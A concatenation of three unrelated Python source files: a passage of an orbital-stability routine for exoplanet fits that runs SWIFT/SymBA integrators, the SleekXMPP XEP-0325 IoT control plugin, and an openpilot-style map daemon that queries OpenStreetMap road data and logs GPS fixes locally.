obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
#try:
# os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
#except OSError:
# pass
os.chdir('../')
if remove_stab_save_dir == True:
os.system("rm -r %s"%stab_save_dir)
os.chdir('../')
print("stability with: %s done!"%integrator)
return obj
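# Usage sketch for run_stability (illustrative; 'fit' is a hypothetical fitted object and
# the call assumes the compiled swift/symba binaries are present under ./stability/ as
# expected by the function above).
def _example_run_stability(fit):
    """Integrate the best-fit system for 2000 yr with symba and return the object."""
    return run_stability(fit, timemax=2000.0, timestep=10,
                         timeout_sec=1000.0, integrator='symba')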
def run_stability_arb(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
    ##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
    max_time = float(timemax)*365.25 # convert to days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.arb_st_mass).encode()), bytes(str(obj.npl_arb).encode() ) ))
for j in range(9):
if obj.pl_arb_use[j] == True:
getin_file.write(b'%s \n'%bytes(str(obj.mass_arb[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.a_arb[j]).encode()),
bytes(str(obj.e_arb[j]).encode()),
bytes(str(obj.i_arb[j]).encode()),
bytes(str(obj.w_arb[j]).encode()),
bytes(str(obj.Node_arb[j]).encode()),
bytes(str(obj.M0_arb[j]).encode() )) )
else:
continue
#
getin_file.close()
    # running the Fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl_arb):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
def run_copl_fit_stab(obj, incl_max=90.0, incl_min=90.0, incl_step = 1.0, save_output=True, output_file="./copl_incl.txt", fit_bf = False,
timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './run', remove_stab_save_dir = True, integrator='symba',a_threshold =10, e_max =0.9):
"""So far only RVs can be fitted!!!"""
incl_fit = dill.copy(obj)
incl_fit.mod_dynamical=True
if save_output == True:
f = open(output_file,"w")
incl_range = np.arange(incl_max,incl_min,-incl_step)
for incl in incl_range:
for i in range(incl_fit.npl):
incl_fit.params.planet_params[7*i+5] = incl
incl_fit.use.use_planet_params[7*i+5] = False
if fit_bf:
incl_fit.use.update_use_planet_params_one_planet(i,True,True,True,True,True,False,False)
else:
incl_fit.use.update_use_planet_params_one_planet(i,False,False,False,False,False,False,False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=False, amoeba_starts=0, print_stat=False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=True, amoeba_starts=10, print_stat=False)
run_stability(incl_fit, timemax=timemax, timestep=timestep, timeout_sec=timeout_sec, stab_save_dir = stab_save_dir, remove_stab_save_dir = remove_stab_save_dir, integrator=integrator)
for i in range(incl_fit.npl):
export_orbital_evol(incl_fit, file='planet_%s_%s.txt'%(i,incl), planet = i+1, width = 10, precision = 6)
stab_amd = int(get_AMD_stab(incl_fit))
stab = 1
for i in range(incl_fit.npl):
if max(incl_fit.evol_e[i]) > e_max:
stab = 0
print("%s %s "%(incl,incl_fit.loglik))
if save_output == True:
f.write("%s"%incl_fit.loglik)
for i in range(incl_fit.npl):
for z in range(7):
f.write("%s " %(incl_fit.params.planet_params[7*i+z]))
f.write("%s %s\n"%(stab,stab_amd))
if save_output == True:
f.close()
return obj
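# Usage sketch for run_copl_fit_stab (illustrative; 'fit' is a hypothetical RV fit). The
# scan steps the common inclination from incl_max down to incl_min, refits at each step,
# runs a short stability check, and logs one line per inclination to the output file.
def _example_coplanar_scan(fit):
    """Scan inclinations from 90 to 30 deg in 5 deg steps. Never called anywhere."""
    return run_copl_fit_stab(fit, incl_max=90.0, incl_min=30.0, incl_step=5.0,
                             output_file='./copl_incl.txt', timemax=1000.0)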
control.py
"""
SleekXMPP: The Sleek XMPP Library
Implementation of xeps for Internet of Things
http://wiki.xmpp.org/web/Tech_pages/IoT_systems
Copyright (C) 2013 Sustainable Innovation, Joachim.lindborg@sust.se, bjorn.westrom@consoden.se
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import logging
import time
from threading import Thread, Timer, Lock
from sleekxmpp.xmlstream import JID
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.plugins.base import BasePlugin
from sleekxmpp.plugins.xep_0325 import stanza
from sleekxmpp.plugins.xep_0325.stanza import Control
log = logging.getLogger(__name__)
class XEP_0325(BasePlugin):
"""
XEP-0325: IoT Control
Actuators are devices in sensor networks that can be controlled through
the network and act with the outside world. In sensor networks and
Internet of Things applications, actuators make it possible to automate
real-world processes.
This plugin implements a mechanism whereby actuators can be controlled
in XMPP-based sensor networks, making it possible to integrate sensors
and actuators of different brands, makes and models into larger
Internet of Things applications.
Also see <http://xmpp.org/extensions/xep-0325.html>
Configuration Values:
threaded -- Indicates if communication with sensors should be threaded.
Defaults to True.
Events:
Sensor side
-----------
Control Event:DirectSet -- Received a control message
Control Event:SetReq -- Received a control request
Client side
-----------
Control Event:SetResponse -- Received a response to a
control request, type result
Control Event:SetResponseError -- Received a response to a
control request, type error
Attributes:
threaded -- Indicates if command events should be threaded.
Defaults to True.
sessions -- A dictionary or equivalent backend mapping
session IDs to dictionaries containing data
relevant to a request's session. This dictionary is used
both by the client and sensor side. On client side, seqnr
is used as key, while on sensor side, a session_id is used
as key. This ensures that the two will not collide, so
one instance can be both client and sensor.
Sensor side
-----------
nodes -- A dictionary mapping sensor nodes that are serviced through
this XMPP instance to their device handlers ("drivers").
Client side
-----------
last_seqnr -- The last used sequence number (integer). One sequence of
communication (e.g. -->request, <--accept, <--fields)
between client and sensor is identified by a unique
sequence number (unique between the client/sensor pair)
Methods:
plugin_init -- Overrides base_plugin.plugin_init
post_init -- Overrides base_plugin.post_init
plugin_end -- Overrides base_plugin.plugin_end
Sensor side
-----------
register_node -- Register a sensor as available from this XMPP
instance.
Client side
-----------
set_request -- Initiates a control request to modify data in
sensor(s). Non-blocking, a callback function will
be called when the sensor has responded.
set_command -- Initiates a control command to modify data in
sensor(s). Non-blocking. The sensor(s) will not
respond regardless of the result of the command,
so no callback is made.
"""
name = 'xep_0325'
description = 'XEP-0325 Internet of Things - Control'
dependencies = set(['xep_0030'])
stanza = stanza
default_config = {
'threaded': True
# 'session_db': None
}
def plugin_init(self):
""" Start the XEP-0325 plugin """
self.xmpp.register_handler(
Callback('Control Event:DirectSet',
StanzaPath('message/set'),
self._handle_direct_set))
self.xmpp.register_handler(
Callback('Control Event:SetReq',
StanzaPath('iq@type=set/set'),
self._handle_set_req))
self.xmpp.register_handler(
Callback('Control Event:SetResponse',
StanzaPath('iq@type=result/setResponse'),
self._handle_set_response))
self.xmpp.register_handler(
Callback('Control Event:SetResponseError',
StanzaPath('iq@type=error/setResponse'),
self._handle_set_response))
# Server side dicts
self.nodes = {};
self.sessions = {};
self.last_seqnr = 0;
self.seqnr_lock = Lock();
        ## For testing only
self.test_authenticated_from = ""
def post_init(self):
""" Init complete. Register our features in Serivce discovery. """
BasePlugin.post_init(self)
self.xmpp['xep_0030'].add_feature(Control.namespace)
self.xmpp['xep_0030'].set_items(node=Control.namespace, items=tuple())
def _new_session(self):
""" Return a new session ID. """
return str(time.time()) + '-' + self.xmpp.new_id()
def plugin_end(self):
""" Stop the XEP-0325 plugin """
self.sessions.clear();
self.xmpp.remove_handler('Control Event:DirectSet')
self.xmpp.remove_handler('Control Event:SetReq')
self.xmpp.remove_handler('Control Event:SetResponse')
self.xmpp.remove_handler('Control Event:SetResponseError')
self.xmpp['xep_0030'].del_feature(feature=Control.namespace)
self.xmpp['xep_0030'].set_items(node=Control.namespace, items=tuple());
# =================================================================
# Sensor side (data provider) API
def register_node(self, nodeId, device, commTimeout, sourceId=None, cacheType=None):
"""
Register a sensor/device as available for control requests/commands
through this XMPP instance.
The device object may be any custom implementation to support
specific devices, but it must implement the functions:
has_control_field
set_control_fields
according to the interfaces shown in the example device.py file.
Arguments:
nodeId -- The identifier for the device
device -- The device object
commTimeout -- Maximum time in seconds to wait for a callback from the
device during a control operation. Float.
sourceId -- [optional] identifying the data source controlling the device
cacheType -- [optional] narrowing down the search to a specific kind of node
"""
self.nodes[nodeId] = {"device": device,
"commTimeout": commTimeout,
"sourceId": sourceId,
"cacheType": cacheType};
def _set_authenticated(self, auth=''):
""" Internal testing function """
self.test_authenticated_from = auth;
def _get_new_seqnr(self):
""" Returns a unique sequence number (unique across threads) """
self.seqnr_lock.acquire();
self.last_seqnr = self.last_seqnr + 1;
self.seqnr_lock.release();
return str(self.last_seqnr);
def _handle_set_req(self, iq):
"""
Event handler for reception of an Iq with set req - this is a
control request.
Verifies that
- all the requested nodes are available
(if no nodes are specified in the request, assume all nodes)
- all the control fields are available from all nodes serviced
through this XMPP instance
If the request passes verification, the control request is passed
to the devices (in a separate thread).
If the verification fails, a setResponse with error indication
is sent.
"""
error_msg = '';
req_ok = True;
missing_node = None;
missing_field = None;
# Authentication
if len(self.test_authenticated_from) > 0 and not iq['from'] == self.test_authenticated_from:
# Invalid authentication
req_ok = False;
error_msg = "Access denied";
# Nodes
process_nodes = [];
if len(iq['set']['nodes']) > 0:
for n in iq['set']['nodes']:
if not n['nodeId'] in self.nodes:
req_ok = False;
missing_node = n['nodeId'];
error_msg = "Invalid nodeId " + n['nodeId'];
process_nodes = [n['nodeId'] for n in iq['set']['nodes']];
else:
process_nodes = self.nodes.keys();
# Fields - for control we need to find all in all devices, otherwise we reject
process_fields = [];
if len(iq['set']['datas']) > 0:
for f in iq['set']['datas']:
for node in self.nodes:
if not self.nodes[node]["device"].has_control_field(f['name'], f._get_typename()):
req_ok = False;
missing_field = f['name'];
error_msg = "Invalid field " + f['name'];
break;
process_fields = [(f['name'], f._get_typename(), f['value']) for f in iq['set']['datas']];
if req_ok:
session = self._new_session();
self.sessions[session] = {"from": iq['from'], "to": iq['to'], "seqnr": iq['id']};
self.sessions[session]["commTimers"] = {};
self.sessions[session]["nodeDone"] = {};
# Flag that a reply is expected when we are done
self.sessions[session]["reply"] = True;
self.sessions[session]["node_list"] = process_nodes;
if self.threaded:
#print("starting thread")
tr_req = Thread(target=self._threaded_node_request, args=(session, process_fields))
tr_req.start()
#print("started thread")
else:
self._threaded_node_request(session, process_fields);
else:
iq.reply();
iq['type'] = 'error';
iq['setResponse']['responseCode'] = "NotFound";
if missing_node is not None:
iq['setResponse'].add_node(missing_node);
if missing_field is not None:
iq['setResponse'].add_data(missing_field);
iq['setResponse']['error']['var'] = "Output";
iq['setResponse']['error']['text'] = error_msg;
iq.send(block=False);
def _handle_direct_set(self, msg):
"""
Event handler for reception of a Message with set command - this is a
direct control command.
Verifies that
- all the requested nodes are available
(if no nodes are specified in the request, assume all nodes)
- all the control fields are available from all nodes serviced
through this XMPP instance
If the request passes verification, the control request is passed
to the devices (in a separate thread).
If the verification fails, do nothing.
"""
req_ok = True;
# Nodes
process_nodes = [];
if len(msg['set']['nodes']) > 0:
for n in msg['set']['nodes']:
if not n['nodeId'] in self.nodes:
req_ok = False;
error_msg = "Invalid nodeId " + n['nodeId'];
process_nodes = [n['nodeId'] for n in msg['set']['nodes']];
else:
process_nodes = self.nodes.keys();
# Fields - for control we need to find all in all devices, otherwise we reject
process_fields = [];
if len(msg['set']['datas']) > 0:
for f in msg['set']['datas']:
for node in self.nodes:
if not self.nodes[node]["device"].has_control_field(f['name'], f._get_typename()):
req_ok = False;
missing_field = f['name'];
error_msg = "Invalid field " + f['name'];
break;
process_fields = [(f['name'], f._get_typename(), f['value']) for f in msg['set']['datas']];
if req_ok:
session = self._new_session();
self.sessions[session] = {"from": msg['from'], "to": msg['to']};
self.sessions[session]["commTimers"] = {};
self.sessions[session]["nodeDone"] = {};
self.sessions[session]["reply"] = False;
self.sessions[session]["node_list"] = process_nodes;
if self.threaded:
#print("starting thread")
tr_req = Thread(target=self._threaded_node_request, args=(session, process_fields))
tr_req.start()
#print("started thread")
else:
self._threaded_node_request(session, process_fields);
def _threaded_node_request(self, session, process_fields):
"""
Helper function to handle the device control in a separate thread.
Arguments:
session -- The request session id
process_fields -- The fields to set in the devices. List of tuple format:
(name, datatype, value)
"""
for node in self.sessions[session]["node_list"]:
self.sessions[session]["nodeDone"][node] = False;
for node in self.sessions[session]["node_list"]:
timer = Timer(self.nodes[node]['commTimeout'], self._event_comm_timeout, args=(session, node));
self.sessions[session]["commTimers"][node] = timer;
timer.start();
self.nodes[node]['device'].set_control_fields(process_fields, session=session, callback=self._device_set_command_callback);
def _event_comm_timeout(self, session, nodeId):
"""
Triggered if any of the control operations timeout.
Stop communicating with the failing device.
If the control command was an Iq request, sends a failure
message back to the client.
Arguments:
session -- The request session id
nodeId -- The id of the device which timed out
"""
if self.sessions[session]["reply"]:
# Reply is expected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "error";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OtherError";
iq['setResponse'].add_node(nodeId);
iq['setResponse']['error']['var'] = "Output";
iq['setResponse']['error']['text'] = "Timeout.";
iq.send(block=False);
## TODO - should we send one timeout per node??
# Drop communication with this device and check if we are done
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
# The session is complete, delete it
del self.sessions[session];
def _all_nodes_done(self, session):
"""
Checks whether all devices are done replying to the control command.
Arguments:
session -- The request session id
"""
for n in self.sessions[session]["nodeDone"]:
if not self.sessions[session]["nodeDone"][n]:
return False;
return True;
def _device_set_command_callback(self, session, nodeId, result, error_field=None, error_msg=None):
"""
Callback function called by the devices when the control command is
complete or failed.
If needed, composes a message with the result and sends it back to the
client.
Arguments:
session -- The request session id
nodeId -- The device id which initiated the callback
result -- The current result status of the control command. Valid values are:
"error" - Set fields failed.
"ok" - All fields were set.
error_field -- [optional] Only applies when result == "error"
The field name that failed (usually means it is missing)
error_msg -- [optional] Only applies when result == "error".
Error details when a request failed.
"""
if not session in self.sessions:
# This can happen if a session was deleted, like in a timeout. Just drop the data.
return
if result == "error":
self.sessions[session]["commTimers"][nodeId].cancel();
if self.sessions[session]["reply"]:
# Reply is expected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "error";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OtherError";
iq['setResponse'].add_node(nodeId);
if error_field is not None:
iq['setResponse'].add_data(error_field);
iq['setResponse']['error']['var'] = error_field;
iq['setResponse']['error']['text'] = error_msg;
iq.send(block=False);
# Drop communication with this device and check if we are done
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
# The session is complete, delete it
del self.sessions[session];
else:
self.sessions[session]["commTimers"][nodeId].cancel();
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
if self.sessions[session]["reply"]:
# Reply is expected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "result";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OK";
iq.send(block=False);
# The session is complete, delete it
del self.sessions[session];
# =================================================================
# Client side (data controller) API
def set_request(self, from_jid, to_jid, callback, fields, nodeIds=None):
"""
Called on the client side to initiate a control request.
Composes a message with the request and sends it to the device(s).
Does not block; the callback will be called when the device(s)
have responded.
Arguments:
from_jid -- The jid of the requester
to_jid -- The jid of the device(s)
callback -- The callback function to call when data is available.
The callback function must support the following arguments:
from_jid -- The jid of the responding device(s)
result -- The result of the control request. Valid values are:
"OK" - Control request completed successfully
"NotFound" - One or more nodes or fields are missing
"InsufficientPrivileges" - Not authorized.
"Locked" - Field(s) is locked and cannot
be changed at the moment.
"NotImplemented" - Request feature not implemented.
"FormError" - Error while setting with
a form (not implemented).
"OtherError" - Indicates other types of
errors, such as timeout.
Details in the error_msg.
nodeId -- [optional] Only applicable when result == "error"
List of node Ids of failing device(s).
fields -- [optional] Only applicable when result == "error"
List of fields that failed.
error_msg -- Details about why the request failed.
fields -- Fields to set. List of tuple format: (name, typename, value).
nodeIds -- [optional] Limits the request to the node Ids in this list.
"""
iq = self.xmpp.Iq();
iq['from'] = from_jid;
iq['to'] = to_jid;
seqnr = self._get_new_seqnr();
iq['id'] = seqnr;
iq['type'] = "set";
if nodeIds is not None:
for nodeId in nodeIds:
iq['set'].add_node(nodeId);
if fields is not None:
for name, typename, value in fields:
iq['set'].add_data(name=name, typename=typename, value=value);
self.sessions[seqnr] = {"from": iq['from'], "to": iq['to'], "callback": callback};
iq.send(block=False);
def set_command(self, from_jid, to_jid, fields, nodeIds=None):
"""
Called on the client side to initiate a control command.
Composes a message with the set command and sends it to the device(s).
Does not block. Device(s) will not respond, regardless of result.
Arguments:
from_jid -- The jid of the requester
to_jid -- The jid of the device(s)
fields -- Fields to set. List of tuple format: (name, typename, value).
nodeIds -- [optional] Limits the request to the node Ids in this list.
"""
msg = self.xmpp.Message();
msg['from'] = from_jid;
msg['to'] = to_jid;
msg['type'] = "set";
if nodeIds is not None:
for nodeId in nodeIds:
msg['set'].add_node(nodeId);
if fields is not None:
for name, typename, value in fields:
msg['set'].add_data(name, typename, value);
# We won't get any reply, so don't create a session
msg.send();
def _handle_set_response(self, iq):
""" Received response from device(s) """
#print("ooh")
seqnr = iq['id'];
from_jid = str(iq['from']);
result = iq['setResponse']['responseCode'];
nodeIds = [n['name'] for n in iq['setResponse']['nodes']];
fields = [f['name'] for f in iq['setResponse']['datas']];
error_msg = None;
if not iq['setResponse'].find('error') is None and not iq['setResponse']['error']['text'] == "":
error_msg = iq['setResponse']['error']['text'];
callback = self.sessions[seqnr]["callback"];
callback(from_jid=from_jid, result=result, nodeIds=nodeIds, fields=fields, error_msg=error_msg);
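# Client-side usage sketch (assumption: a connected session with this plugin
# loaded; jids, node ids and field names below are placeholders). The callback
# signature mirrors the set_request() docstring above.
#
#   def on_set_response(from_jid, result, nodeIds=None, fields=None, error_msg=None):
#       if result == "OK":
#           print("Control request accepted by %s" % from_jid)
#       else:
#           print("Control request failed (%s): %s" % (result, error_msg))
#
#   xmpp['xep_0325'].set_request(
#       from_jid='controller@example.com', to_jid='device@example.com',
#       callback=on_set_response,
#       fields=[('setTemperature', 'double', '22.5')],
#       nodeIds=['dev0001'])
#
#   # Fire-and-forget variant; the device(s) will not respond:
#   xmpp['xep_0325'].set_command(
#       from_jid='controller@example.com', to_jid='device@example.com',
#       fields=[('lampSwitch', 'boolean', 'true')])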
|
mapd.py
|
#!/usr/bin/env python
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from math import sin,cos
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
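# Usage sketch (coordinates are placeholders), mirroring how query_thread()
# below sends the generated Overpass QL to the API with overpy:
#
#   api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
#   q = build_way_query(52.37, 4.90, radius=3000)
#   result = api.query(q)   # exposes result.ways, result.nodes and result.areas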
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 3000:  # only re-query once we are within 1 km of the edge of the 4 km circle downloaded below
continue
if dist > 4000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=4000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def save_gps_data(gps):
try:
location = [gps.speed, gps.bearing, gps.latitude, gps.longitude, gps.altitude, gps.accuracy, time.time()]
with open("/data/openpilot/selfdrive/data_collection/gps-data", "a") as f:
f.write("{}\n".format(location))
except:
pass
def mapsd_thread():
global last_gps
context = zmq.Context()
poller = zmq.Poller()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True, poller=poller)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
traffic_data_sock = messaging.sub_sock(context, service_list['liveTrafficData'].port, conflate=True, poller=poller)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
speedLimittraffic = 0
speedLimittraffic_prev = 0
max_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
max_speed_prev = 0
speedLimittrafficvalid = False
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = None
traffic = None
for socket, event in poller.poll(0):
if socket is gps_external_sock:
gps_ext = messaging.recv_one(socket)
elif socket is traffic_data_sock:
traffic = messaging.recv_one(socket)
if traffic is not None:
if traffic.liveTrafficData.speedLimitValid:
speedLimittraffic = traffic.liveTrafficData.speedLimit
if abs(speedLimittraffic_prev - speedLimittraffic) > 0.1:
speedLimittrafficvalid = True
speedLimittraffic_prev = speedLimittraffic
if traffic.liveTrafficData.speedAdvisoryValid:
speedLimittrafficAdvisory = traffic.liveTrafficData.speedAdvisory
speedLimittrafficAdvisoryvalid = True
else:
speedLimittrafficAdvisoryvalid = False
else:
speedLimittrafficAdvisoryvalid = False
speedLimittrafficvalid = False
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
save_gps_data(gps)
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
max_speed_ahead = None
max_speed_ahead_dist = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
